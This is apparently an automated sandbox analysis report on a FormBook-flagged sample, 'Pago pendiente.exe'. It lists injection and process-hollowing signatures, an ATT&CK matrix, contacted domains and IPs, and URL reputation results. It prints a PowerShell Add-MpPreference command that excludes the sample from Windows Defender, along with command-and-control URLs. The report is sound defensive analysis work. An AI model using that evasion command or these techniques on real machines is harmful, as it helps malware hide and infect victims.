          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01454A35 mov eax, dword ptr fs:[00000030h]5_2_01454A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146CA38 mov eax, dword ptr fs:[00000030h]5_2_0146CA38
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01486ACC mov eax, dword ptr fs:[00000030h]5_2_01486ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01486ACC mov eax, dword ptr fs:[00000030h]5_2_01486ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01486ACC mov eax, dword ptr fs:[00000030h]5_2_01486ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01430AD0 mov eax, dword ptr fs:[00000030h]5_2_01430AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01464AD0 mov eax, dword ptr fs:[00000030h]5_2_01464AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01464AD0 mov eax, dword ptr fs:[00000030h]5_2_01464AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146AAEE mov eax, dword ptr fs:[00000030h]5_2_0146AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146AAEE mov eax, dword ptr fs:[00000030h]5_2_0146AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143EA80 mov eax, dword ptr fs:[00000030h]5_2_0143EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143EA80 mov eax, dword ptr fs:[00000030h]5_2_0143EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143EA80 mov eax, dword ptr fs:[00000030h]5_2_0143EA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006860F GetProcessHeap,HeapFree,memset,7_2_0006860F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000642F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000642F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00064550 SetUnhandledExceptionFilter,7_2_00064550
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 60000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A36008Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000003.3097001927.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4449891914.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097220261.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2020151196.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4443935876.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2011719338.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.4443289671.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011068724.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Users\user\Desktop\Pago pendiente.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00064775 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00064775
          Source: C:\Users\user\Desktop\Pago pendiente.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		812
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		11
          Disable or Modify Tools          		LSASS Memory141
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook812
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSync113
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430321 Sample: Pago pendiente.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 32 www.zgcple.info 2->32 34 www.wonderdread.cloud 2->34 36 14 other IPs or domains 2->36 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 9 other signatures 2->50 11 Pago pendiente.exe 4 2->11         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 11->60 62 Allocates memory in foreign processes 11->62 64 Adds a directory exclusion to Windows Defender 11->64 66 Injects a PE file into a foreign processes 11->66 14 RegSvcs.exe 11->14         started        17 powershell.exe 23 11->17         started        process6 signatures7 68 Modifies the context of a thread in another process (thread injection) 14->68 70 Maps a DLL or memory area into another process 14->70 72 Sample uses process hollowing technique 14->72 76 2 other signatures 14->76 19 explorer.exe 94 7 14->19 injected 74 Loading BitLocker PowerShell Module 17->74 23 conhost.exe 17->23         started        process8 dnsIp9 38 www.tronbank.club 103.224.212.216, 49717, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 19->38 40 k2securityhn.com 3.33.130.190, 49719, 49724, 80 AMAZONEXPANSIONGB United States 19->40 42 www.airzf.com 154.12.38.29, 49721, 80 UNMETEREDCA United States 19->42 52 System process connects to network (likely due to code injection or exploit) 19->52 25 control.exe 19->25         started        signatures10 process11 signatures12 54 Modifies the context of a thread in another process (thread injection) 25->54 56 Maps a DLL or memory area into another process 25->56 58 Tries to detect virtualization through RDTSC time measurements 25->58 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Pago pendiente.exe24%ReversingLabs
          Pago pendiente.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://word.office.comon0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
          http://www.eternalknot1008.comReferer:0%Avira URL Cloudsafe
          http://www.eternalknot1008.com/gs12/0%Avira URL Cloudsafe
          http://www.hjgd.xyz0%Avira URL Cloudsafe
          http://www.signomo.com/gs12/www.urxetqt.com0%Avira URL Cloudsafe
          http://www.actnowgreen.com/gs12/0%Avira URL Cloudsafe
          http://www.sports565.com/gs12/0%Avira URL Cloudsafe
          http://www.k2securityhn.com/gs12/0%Avira URL Cloudsafe
          http://www.y2llvq.vip/gs12/0%Avira URL Cloudsafe
          http://www.actnowgreen.com0%Avira URL Cloudsafe
          http://crl.v0%URL Reputationsafe
          http://www.urxetqt.com/gs12/www.hjgd.xyz100%Avira URL Cloudphishing
          http://www.tronbank.club/gs12/0%Avira URL Cloudsafe
          http://www.signomo.comReferer:0%Avira URL Cloudsafe
          http://www.umastyle.clubReferer:0%Avira URL Cloudsafe
          http://www.zgcple.info/gs12/0%Avira URL Cloudsafe
          http://www.y2llvq.vip0%Avira URL Cloudsafe
          http://www.51win.inkReferer:0%Avira URL Cloudsafe
          http://www.tronbank.club/gs12/www.signomo.com0%Avira URL Cloudsafe
          http://www.sports565.com0%Avira URL Cloudsafe
          http://www.51win.ink/gs12/0%Avira URL Cloudsafe
          http://www.airzf.comReferer:0%Avira URL Cloudsafe
          http://www.eternalknot1008.com/gs12/www.zgcple.info0%Avira URL Cloudsafe
          http://www.lolabeautystudios.com/gs12/www.y2llvq.vip0%Avira URL Cloudsafe
          http://www.zgcple.infoReferer:0%Avira URL Cloudsafe
          http://www.lolabeautystudios.com0%Avira URL Cloudsafe
          http://www.airzf.com/gs12/www.actnowgreen.com0%Avira URL Cloudsafe
          http://www.actnowgreen.com/gs12/www.udin88b.us0%Avira URL Cloudsafe
          http://www.k2securityhn.comReferer:0%Avira URL Cloudsafe
          http://www.hjgd.xyz/gs12/www.airzf.com0%Avira URL Cloudsafe
          http://www.y2llvq.vipReferer:0%Avira URL Cloudsafe
          http://www.sports565.comReferer:0%Avira URL Cloudsafe
          http://www.eternalknot1008.com0%Avira URL Cloudsafe
          http://www.umastyle.club0%Avira URL Cloudsafe
          http://www.y2llvq.vip/gs12/www.51win.ink0%Avira URL Cloudsafe
          http://www.airzf.com0%Avira URL Cloudsafe
          http://www.urxetqt.com100%Avira URL Cloudphishing
          http://www.hjgd.xyzReferer:0%Avira URL Cloudsafe
          http://www.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba0%Avira URL Cloudsafe
          http://www.wonderdread.cloud/gs12/www.umastyle.club0%Avira URL Cloudsafe
          http://www.signomo.com0%Avira URL Cloudsafe
          www.lolabeautystudios.com/gs12/0%Avira URL Cloudsafe
          http://www.udin88b.us0%Avira URL Cloudsafe
          http://www.51win.ink0%Avira URL Cloudsafe
          http://www.umastyle.club/gs12/www.sports565.com0%Avira URL Cloudsafe
          http://www.lolabeautystudios.comReferer:0%Avira URL Cloudsafe
          http://www.51win.ink/gs12/ch_cf0%Avira URL Cloudsafe
          http://www.udin88b.usReferer:0%Avira URL Cloudsafe
          http://www.lolabeautystudios.com/gs12/0%Avira URL Cloudsafe
          http://www.k2securityhn.com/gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba0%Avira URL Cloudsafe
          http://www.zgcple.info/gs12/www.k2securityhn.com0%Avira URL Cloudsafe
          http://www.tronbank.clubReferer:0%Avira URL Cloudsafe
